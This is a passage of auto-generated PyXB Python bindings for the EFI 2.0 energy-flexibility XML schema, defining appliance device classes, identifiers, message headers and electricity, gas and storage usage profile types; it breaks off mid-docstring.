STD_ANON_._CF_maxInclusive = pyxb.binding.facets.CF_maxInclusive(value_datatype=STD_ANON_, value=pyxb.binding.datatypes.double(1.0))
STD_ANON_._CF_minInclusive = pyxb.binding.facets.CF_minInclusive(value_datatype=STD_ANON_, value=pyxb.binding.datatypes.double(0.0))
STD_ANON_._InitializeFacetMap(STD_ANON_._CF_minInclusive, STD_ANON_._CF_maxInclusive)
_module_typeBindings.STD_ANON_ = STD_ANON_
# Atomic simple type: [anonymous]
class STD_ANON_2 (pyxb.binding.datatypes.double):
    """Anonymous atomic simple type: a double restricted to [0.0, 1.0]."""
    _ExpandedName = None
    _XSDLocation = pyxb.utils.utility.Location('/usr/local/defpi/resources/xsd/InflexibleControllerEfi20.xsd', 903, 7)
    _Documentation = None
# Constrain the value space to the closed interval [0.0, 1.0].
STD_ANON_2._CF_maxInclusive = pyxb.binding.facets.CF_maxInclusive(value_datatype=STD_ANON_2, value=pyxb.binding.datatypes.double(1.0))
STD_ANON_2._CF_minInclusive = pyxb.binding.facets.CF_minInclusive(value_datatype=STD_ANON_2, value=pyxb.binding.datatypes.double(0.0))
STD_ANON_2._InitializeFacetMap(STD_ANON_2._CF_minInclusive, STD_ANON_2._CF_maxInclusive)
_module_typeBindings.STD_ANON_2 = STD_ANON_2
# Atomic simple type: [anonymous]
class STD_ANON_3 (pyxb.binding.datatypes.double):
    """Anonymous atomic simple type: a double restricted to [0.0, 1.0]."""
    _ExpandedName = None
    _XSDLocation = pyxb.utils.utility.Location('/usr/local/defpi/resources/xsd/InflexibleControllerEfi20.xsd', 925, 7)
    _Documentation = None
# Constrain the value space to the closed interval [0.0, 1.0].
STD_ANON_3._CF_maxInclusive = pyxb.binding.facets.CF_maxInclusive(value_datatype=STD_ANON_3, value=pyxb.binding.datatypes.double(1.0))
STD_ANON_3._CF_minInclusive = pyxb.binding.facets.CF_minInclusive(value_datatype=STD_ANON_3, value=pyxb.binding.datatypes.double(0.0))
STD_ANON_3._InitializeFacetMap(STD_ANON_3._CF_minInclusive, STD_ANON_3._CF_maxInclusive)
_module_typeBindings.STD_ANON_3 = STD_ANON_3
# Atomic simple type: {http://www.flexiblepower.org/efi-2}DeviceClass
class DeviceClass (pyxb.binding.datatypes.string, pyxb.binding.basis.enumeration_mixin):
    """XSD string enumeration of appliance device classes
    (e.g. 'Refrigerator', 'Washing Machine', 'Micro-CHP')."""
    _ExpandedName = pyxb.namespace.ExpandedName(Namespace, 'DeviceClass')
    _XSDLocation = pyxb.utils.utility.Location('/usr/local/defpi/resources/xsd/InflexibleControllerEfi20.xsd', 938, 1)
    _Documentation = None
DeviceClass._CF_enumeration = pyxb.binding.facets.CF_enumeration(value_datatype=DeviceClass, enum_prefix=None)
# (tag, lexical value) pairs: tags substitute '_' for spaces and hyphens.
for _tag, _value in (
        ('Refrigerator', 'Refrigerator'),
        ('Freezer', 'Freezer'),
        ('Water_Cooler', 'Water Cooler'),
        ('Water_Heater', 'Water Heater'),
        ('Washing_Machine', 'Washing Machine'),
        ('Clothes_Dryer', 'Clothes Dryer'),
        ('Combo_Washer_Dryer', 'Combo Washer Dryer'),
        ('Drying_Cabinet', 'Drying Cabinet'),
        ('Dishwasher', 'Dishwasher'),
        ('Heatpump', 'Heatpump'),
        ('Micro_CHP', 'Micro-CHP'),
        ('Stationary_Battery', 'Stationary Battery'),
        ('Electrical_Vehicle', 'Electrical Vehicle'),
        ('PV_Panel', 'PV Panel'),
        ('Windmill', 'Windmill'),
        ('Solar_Collector', 'Solar Collector'),
        ('Air_Conditioner', 'Air Conditioner'),
        ('Ventilation', 'Ventilation'),
        ('Air_Quality_Appliance', 'Air Quality Appliance'),
        ('Gas_Geater', 'Gas Geater'),  # sic: 'Geater' is the schema's spelling
        ('Floor_Heating', 'Floor Heating'),
        ('Generator', 'Generator'),
        ('Miscellaneous', 'Miscellaneous')):
    setattr(DeviceClass, _tag, DeviceClass._CF_enumeration.addEnumeration(unicode_value=_value, tag=_tag))
del _tag, _value
DeviceClass._InitializeFacetMap(DeviceClass._CF_enumeration)
Namespace.addCategoryObject('typeBinding', 'DeviceClass', DeviceClass)
_module_typeBindings.DeviceClass = DeviceClass
# Atomic simple type: {http://www.flexiblepower.org/efi-2}Identifier
class Identifier (pyxb.binding.datatypes.string):
    """XSD string restricted by pattern to 2-64 characters drawn from
    letters, digits, '-', '_' and ':'."""
    _ExpandedName = pyxb.namespace.ExpandedName(Namespace, 'Identifier')
    _XSDLocation = pyxb.utils.utility.Location('/usr/local/defpi/resources/xsd/InflexibleControllerEfi20.xsd', 965, 1)
    _Documentation = None
# Attach the schema's pattern facet to the type.
Identifier._CF_pattern = pyxb.binding.facets.CF_pattern()
Identifier._CF_pattern.addPattern(pattern='[a-zA-Z0-9\\-_:]{2,64}')
Identifier._InitializeFacetMap(Identifier._CF_pattern)
_module_typeBindings.Identifier = Identifier
Namespace.addCategoryObject('typeBinding', 'Identifier', Identifier)
# Complex type {http://www.flexiblepower.org/efi-2}EfiMessage with content type ELEMENT_ONLY
class EfiMessage (pyxb.binding.basis.complexTypeDefinition):
    """Complex type {http://www.flexiblepower.org/efi-2}EfiMessage with content type ELEMENT_ONLY

    Abstract base for EFI messages: one C{header} child element plus a
    required C{efiVersion} attribute fixed to '2.0'.
    """
    _TypeDefinition = None
    _ContentTypeTag = pyxb.binding.basis.complexTypeDefinition._CT_ELEMENT_ONLY
    # Abstract: only concrete derived types may appear in instance documents.
    _Abstract = True
    _ExpandedName = pyxb.namespace.ExpandedName(Namespace, 'EfiMessage')
    _XSDLocation = pyxb.utils.utility.Location('/usr/local/defpi/resources/xsd/InflexibleControllerEfi20.xsd', 22, 1)
    _ElementMap = {}
    _AttributeMap = {}
    # Base type is pyxb.binding.datatypes.anyType
    # Element {http://www.flexiblepower.org/efi-2}header uses Python identifier header
    __header = pyxb.binding.content.ElementDeclaration(pyxb.namespace.ExpandedName(Namespace, 'header'), 'header', '__httpwww_flexiblepower_orgefi_2_EfiMessage_httpwww_flexiblepower_orgefi_2header', False, pyxb.utils.utility.Location('/usr/local/defpi/resources/xsd/InflexibleControllerEfi20.xsd', 24, 3), )
    header = property(__header.value, __header.set, None, None)
    # Attribute {http://www.flexiblepower.org/efi-2}efiVersion uses Python identifier efiVersion
    # Required attribute with value fixed at '2.0' (fixed=True below).
    __efiVersion = pyxb.binding.content.AttributeUse(pyxb.namespace.ExpandedName(Namespace, 'efiVersion'), 'efiVersion', '__httpwww_flexiblepower_orgefi_2_EfiMessage_httpwww_flexiblepower_orgefi_2efiVersion', pyxb.binding.datatypes.string, fixed=True, unicode_default='2.0', required=True)
    __efiVersion._DeclarationLocation = pyxb.utils.utility.Location('/usr/local/defpi/resources/xsd/InflexibleControllerEfi20.xsd', 33, 2)
    __efiVersion._UseLocation = pyxb.utils.utility.Location('/usr/local/defpi/resources/xsd/InflexibleControllerEfi20.xsd', 33, 2)
    efiVersion = property(__efiVersion.value, __efiVersion.set, None, None)
    _ElementMap.update({
        __header.name() : __header
    })
    _AttributeMap.update({
        __efiVersion.name() : __efiVersion
    })
_module_typeBindings.EfiMessage = EfiMessage
Namespace.addCategoryObject('typeBinding', 'EfiMessage', EfiMessage)
# Complex type [anonymous] with content type ELEMENT_ONLY
class CTD_ANON (pyxb.binding.basis.complexTypeDefinition):
    """Complex type [anonymous] with content type ELEMENT_ONLY

    Carries an C{efiResourceId} and a C{timestamp} child element.
    NOTE(review): its XSD location (line 25) sits inside EfiMessage's
    C{header} element declaration, so this is presumably the header's
    anonymous content type -- confirm against the schema.
    """
    _TypeDefinition = None
    _ContentTypeTag = pyxb.binding.basis.complexTypeDefinition._CT_ELEMENT_ONLY
    _Abstract = False
    # Anonymous type: no expanded name of its own.
    _ExpandedName = None
    _XSDLocation = pyxb.utils.utility.Location('/usr/local/defpi/resources/xsd/InflexibleControllerEfi20.xsd', 25, 4)
    _ElementMap = {}
    _AttributeMap = {}
    # Base type is pyxb.binding.datatypes.anyType
    # Element {http://www.flexiblepower.org/efi-2}efiResourceId uses Python identifier efiResourceId
    __efiResourceId = pyxb.binding.content.ElementDeclaration(pyxb.namespace.ExpandedName(Namespace, 'efiResourceId'), 'efiResourceId', '__httpwww_flexiblepower_orgefi_2_CTD_ANON_httpwww_flexiblepower_orgefi_2efiResourceId', False, pyxb.utils.utility.Location('/usr/local/defpi/resources/xsd/InflexibleControllerEfi20.xsd', 27, 6), )
    efiResourceId = property(__efiResourceId.value, __efiResourceId.set, None, None)
    # Element {http://www.flexiblepower.org/efi-2}timestamp uses Python identifier timestamp
    __timestamp = pyxb.binding.content.ElementDeclaration(pyxb.namespace.ExpandedName(Namespace, 'timestamp'), 'timestamp', '__httpwww_flexiblepower_orgefi_2_CTD_ANON_httpwww_flexiblepower_orgefi_2timestamp', False, pyxb.utils.utility.Location('/usr/local/defpi/resources/xsd/InflexibleControllerEfi20.xsd', 28, 6), )
    timestamp = property(__timestamp.value, __timestamp.set, None, None)
    _ElementMap.update({
        __efiResourceId.name() : __efiResourceId,
        __timestamp.name() : __timestamp
    })
    # No attributes declared for this type.
    _AttributeMap.update({
    })
_module_typeBindings.CTD_ANON = CTD_ANON
# Complex type {http://www.flexiblepower.org/efi-2}DeviceDescription with content type ELEMENT_ONLY
class DeviceDescription (pyxb.binding.basis.complexTypeDefinition):
    """Complex type {http://www.flexiblepower.org/efi-2}DeviceDescription with content type ELEMENT_ONLY

    Describes a device via C{deviceClass}, C{serialNumber} and C{label}
    child elements.
    """
    _TypeDefinition = None
    _ContentTypeTag = pyxb.binding.basis.complexTypeDefinition._CT_ELEMENT_ONLY
    _Abstract = False
    _ExpandedName = pyxb.namespace.ExpandedName(Namespace, 'DeviceDescription')
    _XSDLocation = pyxb.utils.utility.Location('/usr/local/defpi/resources/xsd/InflexibleControllerEfi20.xsd', 35, 1)
    _ElementMap = {}
    _AttributeMap = {}
    # Base type is pyxb.binding.datatypes.anyType
    # Element {http://www.flexiblepower.org/efi-2}deviceClass uses Python identifier deviceClass
    __deviceClass = pyxb.binding.content.ElementDeclaration(pyxb.namespace.ExpandedName(Namespace, 'deviceClass'), 'deviceClass', '__httpwww_flexiblepower_orgefi_2_DeviceDescription_httpwww_flexiblepower_orgefi_2deviceClass', False, pyxb.utils.utility.Location('/usr/local/defpi/resources/xsd/InflexibleControllerEfi20.xsd', 37, 3), )
    deviceClass = property(__deviceClass.value, __deviceClass.set, None, None)
    # Element {http://www.flexiblepower.org/efi-2}serialNumber uses Python identifier serialNumber
    __serialNumber = pyxb.binding.content.ElementDeclaration(pyxb.namespace.ExpandedName(Namespace, 'serialNumber'), 'serialNumber', '__httpwww_flexiblepower_orgefi_2_DeviceDescription_httpwww_flexiblepower_orgefi_2serialNumber', False, pyxb.utils.utility.Location('/usr/local/defpi/resources/xsd/InflexibleControllerEfi20.xsd', 38, 3), )
    serialNumber = property(__serialNumber.value, __serialNumber.set, None, None)
    # Element {http://www.flexiblepower.org/efi-2}label uses Python identifier label
    __label = pyxb.binding.content.ElementDeclaration(pyxb.namespace.ExpandedName(Namespace, 'label'), 'label', '__httpwww_flexiblepower_orgefi_2_DeviceDescription_httpwww_flexiblepower_orgefi_2label', False, pyxb.utils.utility.Location('/usr/local/defpi/resources/xsd/InflexibleControllerEfi20.xsd', 39, 3), )
    label = property(__label.value, __label.set, None, None)
    _ElementMap.update({
        __deviceClass.name() : __deviceClass,
        __serialNumber.name() : __serialNumber,
        __label.name() : __label
    })
    # No attributes declared for this type.
    _AttributeMap.update({
    })
_module_typeBindings.DeviceDescription = DeviceDescription
Namespace.addCategoryObject('typeBinding', 'DeviceDescription', DeviceDescription)
# Complex type {http://www.flexiblepower.org/efi-2}ProbabilityAttributes with content type EMPTY
class ProbabilityAttributes (pyxb.binding.basis.complexTypeDefinition):
    """Complex type {http://www.flexiblepower.org/efi-2}ProbabilityAttributes with content type EMPTY

    Empty-content type carrying five required double attributes:
    C{expected} plus lower/upper bounds C{the68PPRLower}/C{the68PPRUpper}
    and C{the95PPRLower}/C{the95PPRUpper}.
    NOTE(review): 'PPR' presumably denotes 68%/95% probability ranges
    around the expected value -- confirm against the EFI specification.
    """
    _TypeDefinition = None
    _ContentTypeTag = pyxb.binding.basis.complexTypeDefinition._CT_EMPTY
    _Abstract = False
    _ExpandedName = pyxb.namespace.ExpandedName(Namespace, 'ProbabilityAttributes')
    _XSDLocation = pyxb.utils.utility.Location('/usr/local/defpi/resources/xsd/InflexibleControllerEfi20.xsd', 130, 1)
    _ElementMap = {}
    _AttributeMap = {}
    # Base type is pyxb.binding.datatypes.anyType
    # Attribute {http://www.flexiblepower.org/efi-2}the68PPRLower uses Python identifier the68PPRLower
    __the68PPRLower = pyxb.binding.content.AttributeUse(pyxb.namespace.ExpandedName(Namespace, 'the68PPRLower'), 'the68PPRLower', '__httpwww_flexiblepower_orgefi_2_ProbabilityAttributes_httpwww_flexiblepower_orgefi_2the68PPRLower', pyxb.binding.datatypes.double, required=True)
    __the68PPRLower._DeclarationLocation = pyxb.utils.utility.Location('/usr/local/defpi/resources/xsd/InflexibleControllerEfi20.xsd', 131, 2)
    __the68PPRLower._UseLocation = pyxb.utils.utility.Location('/usr/local/defpi/resources/xsd/InflexibleControllerEfi20.xsd', 131, 2)
    the68PPRLower = property(__the68PPRLower.value, __the68PPRLower.set, None, None)
    # Attribute {http://www.flexiblepower.org/efi-2}the95PPRLower uses Python identifier the95PPRLower
    __the95PPRLower = pyxb.binding.content.AttributeUse(pyxb.namespace.ExpandedName(Namespace, 'the95PPRLower'), 'the95PPRLower', '__httpwww_flexiblepower_orgefi_2_ProbabilityAttributes_httpwww_flexiblepower_orgefi_2the95PPRLower', pyxb.binding.datatypes.double, required=True)
    __the95PPRLower._DeclarationLocation = pyxb.utils.utility.Location('/usr/local/defpi/resources/xsd/InflexibleControllerEfi20.xsd', 132, 2)
    __the95PPRLower._UseLocation = pyxb.utils.utility.Location('/usr/local/defpi/resources/xsd/InflexibleControllerEfi20.xsd', 132, 2)
    the95PPRLower = property(__the95PPRLower.value, __the95PPRLower.set, None, None)
    # Attribute {http://www.flexiblepower.org/efi-2}expected uses Python identifier expected
    __expected = pyxb.binding.content.AttributeUse(pyxb.namespace.ExpandedName(Namespace, 'expected'), 'expected', '__httpwww_flexiblepower_orgefi_2_ProbabilityAttributes_httpwww_flexiblepower_orgefi_2expected', pyxb.binding.datatypes.double, required=True)
    __expected._DeclarationLocation = pyxb.utils.utility.Location('/usr/local/defpi/resources/xsd/InflexibleControllerEfi20.xsd', 133, 2)
    __expected._UseLocation = pyxb.utils.utility.Location('/usr/local/defpi/resources/xsd/InflexibleControllerEfi20.xsd', 133, 2)
    expected = property(__expected.value, __expected.set, None, None)
    # Attribute {http://www.flexiblepower.org/efi-2}the95PPRUpper uses Python identifier the95PPRUpper
    __the95PPRUpper = pyxb.binding.content.AttributeUse(pyxb.namespace.ExpandedName(Namespace, 'the95PPRUpper'), 'the95PPRUpper', '__httpwww_flexiblepower_orgefi_2_ProbabilityAttributes_httpwww_flexiblepower_orgefi_2the95PPRUpper', pyxb.binding.datatypes.double, required=True)
    __the95PPRUpper._DeclarationLocation = pyxb.utils.utility.Location('/usr/local/defpi/resources/xsd/InflexibleControllerEfi20.xsd', 134, 2)
    __the95PPRUpper._UseLocation = pyxb.utils.utility.Location('/usr/local/defpi/resources/xsd/InflexibleControllerEfi20.xsd', 134, 2)
    the95PPRUpper = property(__the95PPRUpper.value, __the95PPRUpper.set, None, None)
    # Attribute {http://www.flexiblepower.org/efi-2}the68PPRUpper uses Python identifier the68PPRUpper
    __the68PPRUpper = pyxb.binding.content.AttributeUse(pyxb.namespace.ExpandedName(Namespace, 'the68PPRUpper'), 'the68PPRUpper', '__httpwww_flexiblepower_orgefi_2_ProbabilityAttributes_httpwww_flexiblepower_orgefi_2the68PPRUpper', pyxb.binding.datatypes.double, required=True)
    __the68PPRUpper._DeclarationLocation = pyxb.utils.utility.Location('/usr/local/defpi/resources/xsd/InflexibleControllerEfi20.xsd', 135, 2)
    __the68PPRUpper._UseLocation = pyxb.utils.utility.Location('/usr/local/defpi/resources/xsd/InflexibleControllerEfi20.xsd', 135, 2)
    the68PPRUpper = property(__the68PPRUpper.value, __the68PPRUpper.set, None, None)
    # EMPTY content: no child elements.
    _ElementMap.update({
    })
    _AttributeMap.update({
        __the68PPRLower.name() : __the68PPRLower,
        __the95PPRLower.name() : __the95PPRLower,
        __expected.name() : __expected,
        __the95PPRUpper.name() : __the95PPRUpper,
        __the68PPRUpper.name() : __the68PPRUpper
    })
_module_typeBindings.ProbabilityAttributes = ProbabilityAttributes
Namespace.addCategoryObject('typeBinding', 'ProbabilityAttributes', ProbabilityAttributes)
# Complex type {http://www.flexiblepower.org/efi-2}StorageUsageProfile with content type ELEMENT_ONLY
class StorageUsageProfile (pyxb.binding.basis.complexTypeDefinition):
    """Complex type {http://www.flexiblepower.org/efi-2}StorageUsageProfile with content type ELEMENT_ONLY

    PyXB-generated binding for the schema type declared at
    InflexibleControllerEfi20.xsd line 144.  Content model: repeated
    {efi-2}element children; no attributes.  Generated code -- do not
    edit by hand; regenerate from the schema instead.
    """
    _TypeDefinition = None  # no simple-type content; derived from xs:anyType
    _ContentTypeTag = pyxb.binding.basis.complexTypeDefinition._CT_ELEMENT_ONLY
    _Abstract = False
    _ExpandedName = pyxb.namespace.ExpandedName(Namespace, 'StorageUsageProfile')
    _XSDLocation = pyxb.utils.utility.Location('/usr/local/defpi/resources/xsd/InflexibleControllerEfi20.xsd', 144, 1)
    _ElementMap = {}  # populated below via update()
    _AttributeMap = {}  # populated below via update()
    # Base type is pyxb.binding.datatypes.anyType
    # Element {http://www.flexiblepower.org/efi-2}element uses Python identifier element
    __element = pyxb.binding.content.ElementDeclaration(pyxb.namespace.ExpandedName(Namespace, 'element'), 'element', '__httpwww_flexiblepower_orgefi_2_StorageUsageProfile_httpwww_flexiblepower_orgefi_2element', True, pyxb.utils.utility.Location('/usr/local/defpi/resources/xsd/InflexibleControllerEfi20.xsd', 146, 3), )
    element = property(__element.value, __element.set, None, None)
    _ElementMap.update({
        __element.name() : __element
    })
    _AttributeMap.update({
    })

# Register the binding in the module and namespace lookup tables.
_module_typeBindings.StorageUsageProfile = StorageUsageProfile
Namespace.addCategoryObject('typeBinding', 'StorageUsageProfile', StorageUsageProfile)
# Complex type [anonymous] with content type EMPTY
class CTD_ANON_ (pyxb.binding.basis.complexTypeDefinition):
    """Complex type [anonymous] with content type EMPTY

    PyXB-generated binding for the anonymous type at
    InflexibleControllerEfi20.xsd line 147 (the element type of
    StorageUsageProfile entries).  No child elements; two required
    attributes: duration (xs:duration) and usageRate (xs:double).
    Generated code -- do not edit by hand.
    """
    _TypeDefinition = None  # no simple-type content; derived from xs:anyType
    _ContentTypeTag = pyxb.binding.basis.complexTypeDefinition._CT_EMPTY
    _Abstract = False
    _ExpandedName = None  # anonymous type: no global schema name
    _XSDLocation = pyxb.utils.utility.Location('/usr/local/defpi/resources/xsd/InflexibleControllerEfi20.xsd', 147, 4)
    _ElementMap = {}
    _AttributeMap = {}
    # Base type is pyxb.binding.datatypes.anyType
    # Attribute {http://www.flexiblepower.org/efi-2}duration uses Python identifier duration
    __duration = pyxb.binding.content.AttributeUse(pyxb.namespace.ExpandedName(Namespace, 'duration'), 'duration', '__httpwww_flexiblepower_orgefi_2_CTD_ANON__httpwww_flexiblepower_orgefi_2duration', pyxb.binding.datatypes.duration, required=True)
    __duration._DeclarationLocation = pyxb.utils.utility.Location('/usr/local/defpi/resources/xsd/InflexibleControllerEfi20.xsd', 148, 5)
    __duration._UseLocation = pyxb.utils.utility.Location('/usr/local/defpi/resources/xsd/InflexibleControllerEfi20.xsd', 148, 5)
    duration = property(__duration.value, __duration.set, None, None)
    # Attribute {http://www.flexiblepower.org/efi-2}usageRate uses Python identifier usageRate
    __usageRate = pyxb.binding.content.AttributeUse(pyxb.namespace.ExpandedName(Namespace, 'usageRate'), 'usageRate', '__httpwww_flexiblepower_orgefi_2_CTD_ANON__httpwww_flexiblepower_orgefi_2usageRate', pyxb.binding.datatypes.double, required=True)
    __usageRate._DeclarationLocation = pyxb.utils.utility.Location('/usr/local/defpi/resources/xsd/InflexibleControllerEfi20.xsd', 149, 5)
    __usageRate._UseLocation = pyxb.utils.utility.Location('/usr/local/defpi/resources/xsd/InflexibleControllerEfi20.xsd', 149, 5)
    usageRate = property(__usageRate.value, __usageRate.set, None, None)
    _ElementMap.update({
    })
    _AttributeMap.update({
        __duration.name() : __duration,
        __usageRate.name() : __usageRate
    })

# Anonymous type: registered in the module map only (no namespace category entry).
_module_typeBindings.CTD_ANON_ = CTD_ANON_
# Complex type {http://www.flexiblepower.org/efi-2}StorageUsageProbabilityProfile with content type ELEMENT_ONLY
class StorageUsageProbabilityProfile (pyxb.binding.basis.complexTypeDefinition):
    """Complex type {http://www.flexiblepower.org/efi-2}StorageUsageProbabilityProfile with content type ELEMENT_ONLY

    PyXB-generated binding for the schema type at
    InflexibleControllerEfi20.xsd line 154.  Content model: repeated
    {efi-2}usageRateElement children; no attributes.  Generated code --
    do not edit by hand.
    """
    _TypeDefinition = None  # no simple-type content; derived from xs:anyType
    _ContentTypeTag = pyxb.binding.basis.complexTypeDefinition._CT_ELEMENT_ONLY
    _Abstract = False
    _ExpandedName = pyxb.namespace.ExpandedName(Namespace, 'StorageUsageProbabilityProfile')
    _XSDLocation = pyxb.utils.utility.Location('/usr/local/defpi/resources/xsd/InflexibleControllerEfi20.xsd', 154, 1)
    _ElementMap = {}
    _AttributeMap = {}
    # Base type is pyxb.binding.datatypes.anyType
    # Element {http://www.flexiblepower.org/efi-2}usageRateElement uses Python identifier usageRateElement
    __usageRateElement = pyxb.binding.content.ElementDeclaration(pyxb.namespace.ExpandedName(Namespace, 'usageRateElement'), 'usageRateElement', '__httpwww_flexiblepower_orgefi_2_StorageUsageProbabilityProfile_httpwww_flexiblepower_orgefi_2usageRateElement', True, pyxb.utils.utility.Location('/usr/local/defpi/resources/xsd/InflexibleControllerEfi20.xsd', 156, 3), )
    usageRateElement = property(__usageRateElement.value, __usageRateElement.set, None, None)
    _ElementMap.update({
        __usageRateElement.name() : __usageRateElement
    })
    _AttributeMap.update({
    })

# Register the binding in the module and namespace lookup tables.
_module_typeBindings.StorageUsageProbabilityProfile = StorageUsageProbabilityProfile
Namespace.addCategoryObject('typeBinding', 'StorageUsageProbabilityProfile', StorageUsageProbabilityProfile)
# Complex type {http://www.flexiblepower.org/efi-2}ElectricityProfile with content type ELEMENT_ONLY
class ElectricityProfile (pyxb.binding.basis.complexTypeDefinition):
    """Complex type {http://www.flexiblepower.org/efi-2}ElectricityProfile with content type ELEMENT_ONLY

    PyXB-generated binding for the schema type at
    InflexibleControllerEfi20.xsd line 159.  Content model: repeated
    {efi-2}element children; no attributes.  Generated code -- do not
    edit by hand.
    """
    _TypeDefinition = None  # no simple-type content; derived from xs:anyType
    _ContentTypeTag = pyxb.binding.basis.complexTypeDefinition._CT_ELEMENT_ONLY
    _Abstract = False
    _ExpandedName = pyxb.namespace.ExpandedName(Namespace, 'ElectricityProfile')
    _XSDLocation = pyxb.utils.utility.Location('/usr/local/defpi/resources/xsd/InflexibleControllerEfi20.xsd', 159, 1)
    _ElementMap = {}
    _AttributeMap = {}
    # Base type is pyxb.binding.datatypes.anyType
    # Element {http://www.flexiblepower.org/efi-2}element uses Python identifier element
    __element = pyxb.binding.content.ElementDeclaration(pyxb.namespace.ExpandedName(Namespace, 'element'), 'element', '__httpwww_flexiblepower_orgefi_2_ElectricityProfile_httpwww_flexiblepower_orgefi_2element', True, pyxb.utils.utility.Location('/usr/local/defpi/resources/xsd/InflexibleControllerEfi20.xsd', 161, 3), )
    element = property(__element.value, __element.set, None, None)
    _ElementMap.update({
        __element.name() : __element
    })
    _AttributeMap.update({
    })

# Register the binding in the module and namespace lookup tables.
_module_typeBindings.ElectricityProfile = ElectricityProfile
Namespace.addCategoryObject('typeBinding', 'ElectricityProfile', ElectricityProfile)
# Complex type [anonymous] with content type EMPTY
class CTD_ANON_2 (pyxb.binding.basis.complexTypeDefinition):
    """Complex type [anonymous] with content type EMPTY

    PyXB-generated binding for the anonymous type at
    InflexibleControllerEfi20.xsd line 162 (the element type of
    ElectricityProfile entries).  No child elements; two required
    attributes: duration (xs:duration) and power (xs:double).
    Generated code -- do not edit by hand.
    """
    _TypeDefinition = None  # no simple-type content; derived from xs:anyType
    _ContentTypeTag = pyxb.binding.basis.complexTypeDefinition._CT_EMPTY
    _Abstract = False
    _ExpandedName = None  # anonymous type: no global schema name
    _XSDLocation = pyxb.utils.utility.Location('/usr/local/defpi/resources/xsd/InflexibleControllerEfi20.xsd', 162, 4)
    _ElementMap = {}
    _AttributeMap = {}
    # Base type is pyxb.binding.datatypes.anyType
    # Attribute {http://www.flexiblepower.org/efi-2}duration uses Python identifier duration
    __duration = pyxb.binding.content.AttributeUse(pyxb.namespace.ExpandedName(Namespace, 'duration'), 'duration', '__httpwww_flexiblepower_orgefi_2_CTD_ANON_2_httpwww_flexiblepower_orgefi_2duration', pyxb.binding.datatypes.duration, required=True)
    __duration._DeclarationLocation = pyxb.utils.utility.Location('/usr/local/defpi/resources/xsd/InflexibleControllerEfi20.xsd', 163, 5)
    __duration._UseLocation = pyxb.utils.utility.Location('/usr/local/defpi/resources/xsd/InflexibleControllerEfi20.xsd', 163, 5)
    duration = property(__duration.value, __duration.set, None, None)
    # Attribute {http://www.flexiblepower.org/efi-2}power uses Python identifier power
    __power = pyxb.binding.content.AttributeUse(pyxb.namespace.ExpandedName(Namespace, 'power'), 'power', '__httpwww_flexiblepower_orgefi_2_CTD_ANON_2_httpwww_flexiblepower_orgefi_2power', pyxb.binding.datatypes.double, required=True)
    __power._DeclarationLocation = pyxb.utils.utility.Location('/usr/local/defpi/resources/xsd/InflexibleControllerEfi20.xsd', 164, 5)
    __power._UseLocation = pyxb.utils.utility.Location('/usr/local/defpi/resources/xsd/InflexibleControllerEfi20.xsd', 164, 5)
    power = property(__power.value, __power.set, None, None)
    _ElementMap.update({
    })
    _AttributeMap.update({
        __duration.name() : __duration,
        __power.name() : __power
    })

# Anonymous type: registered in the module map only (no namespace category entry).
_module_typeBindings.CTD_ANON_2 = CTD_ANON_2
# Complex type {http://www.flexiblepower.org/efi-2}ElectricityProbabilityProfile with content type ELEMENT_ONLY
class ElectricityProbabilityProfile (pyxb.binding.basis.complexTypeDefinition):
    """Complex type {http://www.flexiblepower.org/efi-2}ElectricityProbabilityProfile with content type ELEMENT_ONLY

    PyXB-generated binding for the schema type at
    InflexibleControllerEfi20.xsd line 169.  Content model: repeated
    {efi-2}powerElement children; no attributes.  Generated code -- do
    not edit by hand.
    """
    _TypeDefinition = None  # no simple-type content; derived from xs:anyType
    _ContentTypeTag = pyxb.binding.basis.complexTypeDefinition._CT_ELEMENT_ONLY
    _Abstract = False
    _ExpandedName = pyxb.namespace.ExpandedName(Namespace, 'ElectricityProbabilityProfile')
    _XSDLocation = pyxb.utils.utility.Location('/usr/local/defpi/resources/xsd/InflexibleControllerEfi20.xsd', 169, 1)
    _ElementMap = {}
    _AttributeMap = {}
    # Base type is pyxb.binding.datatypes.anyType
    # Element {http://www.flexiblepower.org/efi-2}powerElement uses Python identifier powerElement
    __powerElement = pyxb.binding.content.ElementDeclaration(pyxb.namespace.ExpandedName(Namespace, 'powerElement'), 'powerElement', '__httpwww_flexiblepower_orgefi_2_ElectricityProbabilityProfile_httpwww_flexiblepower_orgefi_2powerElement', True, pyxb.utils.utility.Location('/usr/local/defpi/resources/xsd/InflexibleControllerEfi20.xsd', 171, 3), )
    powerElement = property(__powerElement.value, __powerElement.set, None, None)
    _ElementMap.update({
        __powerElement.name() : __powerElement
    })
    _AttributeMap.update({
    })

# Register the binding in the module and namespace lookup tables.
_module_typeBindings.ElectricityProbabilityProfile = ElectricityProbabilityProfile
Namespace.addCategoryObject('typeBinding', 'ElectricityProbabilityProfile', ElectricityProbabilityProfile)
# Complex type {http://www.flexiblepower.org/efi-2}GasProfile with content type ELEMENT_ONLY
class GasProfile (pyxb.binding.basis.complexTypeDefinition):
    """Complex type {http://www.flexiblepower.org/efi-2}GasProfile with content type ELEMENT_ONLY

    PyXB-generated binding for the schema type at
    InflexibleControllerEfi20.xsd line 174.  Content model: repeated
    {efi-2}element children; no attributes.  Generated code -- do not
    edit by hand.
    """
    _TypeDefinition = None  # no simple-type content; derived from xs:anyType
    _ContentTypeTag = pyxb.binding.basis.complexTypeDefinition._CT_ELEMENT_ONLY
    _Abstract = False
    _ExpandedName = pyxb.namespace.ExpandedName(Namespace, 'GasProfile')
    _XSDLocation = pyxb.utils.utility.Location('/usr/local/defpi/resources/xsd/InflexibleControllerEfi20.xsd', 174, 1)
    _ElementMap = {}
    _AttributeMap = {}
    # Base type is pyxb.binding.datatypes.anyType
    # Element {http://www.flexiblepower.org/efi-2}element uses Python identifier element
    __element = pyxb.binding.content.ElementDeclaration(pyxb.namespace.ExpandedName(Namespace, 'element'), 'element', '__httpwww_flexiblepower_orgefi_2_GasProfile_httpwww_flexiblepower_orgefi_2element', True, pyxb.utils.utility.Location('/usr/local/defpi/resources/xsd/InflexibleControllerEfi20.xsd', 176, 3), )
    element = property(__element.value, __element.set, None, None)
    _ElementMap.update({
        __element.name() : __element
    })
    _AttributeMap.update({
    })

# Register the binding in the module and namespace lookup tables.
_module_typeBindings.GasProfile = GasProfile
Namespace.addCategoryObject('typeBinding', 'GasProfile', GasProfile)
# Complex type [anonymous] with content type EMPTY
class CTD_ANON_3 (pyxb.binding.basis.complexTypeDefinition):
    """Complex type [anonymous] with content type EMPTY

    PyXB-generated binding for the anonymous type at
    InflexibleControllerEfi20.xsd line 177 (the element type of
